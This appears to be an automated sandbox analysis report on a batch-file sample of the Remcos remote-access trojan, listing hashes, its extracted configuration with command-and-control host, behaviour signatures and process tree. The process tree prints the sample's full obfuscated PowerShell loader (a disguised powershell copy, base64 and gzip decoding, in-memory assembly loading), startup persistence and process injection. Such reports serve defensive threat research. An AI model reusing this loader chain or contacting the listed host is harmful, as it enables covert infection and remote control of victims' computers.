Analysis
-
max time kernel
95s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-12-2024 17:27
Static task
static1
Behavioral task
behavioral1
Sample
Vuupkzeyx.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
Vuupkzeyx.bat
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
Vuupkzeyx.bat
Resource
win11-20241007-en
General
-
Target
Vuupkzeyx.bat
-
Size
1.7MB
-
MD5
cc0e4b5bdfc8fea0703e0e1f2342c915
-
SHA1
d14c623ce04289e2a4024381c2e99c9ff20a84cc
-
SHA256
12ea5712edf3120754d3f1ce995f46bf855a4eb47ed0830a574068a584fae628
-
SHA512
3182d67031dbc35395adf93d6ec3dc5b6cdbcb286f87242ba2bb54090a82f80a2247a277fe6c1d050cd3ac5cb00e1330681e1a89d9887249e498cf6da351b771
-
SSDEEP
24576:hKvkZKBxfTCRFcjanaAKbySo1RfOIPC2ZH5yLJgQiL44e/b4fPh9y0qV5mPRswMD:svo2pJa9Ow50dmbMmCiw
Malware Config
Extracted
remcos
RemoteHost
24.ip.gl.ply.gg:7694
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-4QV34V
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
Vuupkzeyx.bat.Laudescription pid Process procid_target PID 1792 created 3460 1792 Vuupkzeyx.bat.Lau 55 -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Drops startup file 1 IoCs
Processes:
Vuupkzeyx.bat.Laudescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CreationOptions.vbs Vuupkzeyx.bat.Lau -
Executes dropped EXE 1 IoCs
Processes:
Vuupkzeyx.bat.Laupid Process 1792 Vuupkzeyx.bat.Lau -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Vuupkzeyx.bat.Laudescription pid Process procid_target PID 1792 set thread context of 2068 1792 Vuupkzeyx.bat.Lau 90 -
Drops file in Windows directory 1 IoCs
Processes:
InstallUtil.exedescription ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe InstallUtil.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Vuupkzeyx.bat.LauInstallUtil.exeWScript.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Vuupkzeyx.bat.Lau Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Modifies registry class 1 IoCs
Processes:
InstallUtil.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings InstallUtil.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
Vuupkzeyx.bat.Laupid Process 1792 Vuupkzeyx.bat.Lau 1792 Vuupkzeyx.bat.Lau 1792 Vuupkzeyx.bat.Lau -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Vuupkzeyx.bat.Laudescription pid Process Token: SeDebugPrivilege 1792 Vuupkzeyx.bat.Lau Token: SeDebugPrivilege 1792 Vuupkzeyx.bat.Lau -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
cmd.exeVuupkzeyx.bat.LauInstallUtil.exedescription pid Process procid_target PID 2096 wrote to memory of 1044 2096 cmd.exe 85 PID 2096 wrote to memory of 1044 2096 cmd.exe 85 PID 2096 wrote to memory of 2216 2096 cmd.exe 86 PID 2096 wrote to memory of 2216 2096 cmd.exe 86 PID 2096 wrote to memory of 3608 2096 cmd.exe 87 PID 2096 wrote to memory of 3608 2096 cmd.exe 87 PID 2096 wrote to memory of 864 2096 cmd.exe 88 PID 2096 wrote to memory of 864 2096 cmd.exe 88 PID 2096 wrote to memory of 1792 2096 cmd.exe 89 PID 2096 wrote to memory of 1792 2096 cmd.exe 89 PID 2096 wrote to memory of 1792 2096 cmd.exe 89 PID 1792 wrote to memory of 2068 1792 Vuupkzeyx.bat.Lau 90 PID 1792 wrote to memory of 2068 1792 Vuupkzeyx.bat.Lau 90 PID 1792 wrote to memory of 2068 1792 Vuupkzeyx.bat.Lau 90 PID 1792 wrote to memory of 2068 1792 Vuupkzeyx.bat.Lau 90 PID 1792 wrote to memory of 2068 1792 Vuupkzeyx.bat.Lau 90 PID 1792 wrote to memory of 2068 1792 Vuupkzeyx.bat.Lau 90 PID 1792 wrote to memory of 2068 1792 Vuupkzeyx.bat.Lau 90 PID 1792 wrote to memory of 2068 1792 Vuupkzeyx.bat.Lau 90 PID 1792 wrote to memory of 2068 1792 Vuupkzeyx.bat.Lau 90 PID 1792 wrote to memory of 2068 1792 Vuupkzeyx.bat.Lau 90 PID 2068 wrote to memory of 2672 2068 InstallUtil.exe 105 PID 2068 wrote to memory of 2672 2068 InstallUtil.exe 105 PID 2068 wrote to memory of 2672 2068 InstallUtil.exe 105 -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3460
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Vuupkzeyx.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:1044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:2216
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Vuupkzeyx.bat.Lau3⤵PID:3608
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Users\Admin\AppData\Local\Temp\Vuupkzeyx.bat.Lau3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:864
-
-
C:\Users\Admin\AppData\Local\Temp\Vuupkzeyx.bat.LauC:\Users\Admin\AppData\Local\Temp\Vuupkzeyx.bat.Lau -WindowStyle hidden -command "$Eshlfusgtgb = get-content 'C:\Users\Admin\AppData\Local\Temp\Vuupkzeyx.bat' | Select-Object -Last 1; $Kgebqo = [System.Convert]::FromBase64String($Eshlfusgtgb);$Gvjqxfpp = New-Object System.IO.MemoryStream( , $Kgebqo );$Cycjrzzlzy = New-Object System.IO.MemoryStream;$Bibxmqhypv = New-Object System.IO.Compression.GzipStream $Gvjqxfpp, ([IO.Compression.CompressionMode]::Decompress);$Bibxmqhypv.CopyTo( $Cycjrzzlzy );$Bibxmqhypv.Close();$Gvjqxfpp.Close();[byte[]] $Kgebqo = $Cycjrzzlzy.ToArray();[Array]::Reverse($Kgebqo); $Jiasfyokxtu = [System.Threading.Thread]::GetDomain().Load($Kgebqo); $Viwsypp = $Jiasfyokxtu.EntryPoint; $Viwsypp.DeclaringType.InvokeMember($Viwsypp.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1792
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\giqnqjufoufoiovoddc.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:2672
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
382B
MD53db952c728fab3baa68a61db75d074c8
SHA167f61b864fe60acee701cea9cb65469395ff8f30
SHA256b1860633c96be2e60353cf76801c6ea53df1761af69383337b297487748a044b
SHA512a1046e6de280772b293d7f4bb1afd2729d0f435265591ed3e3861607ab8366176e3d53b1a1b628d1adaa396475d6612ea8531ee593198e9ac99d1f5d5bbecea1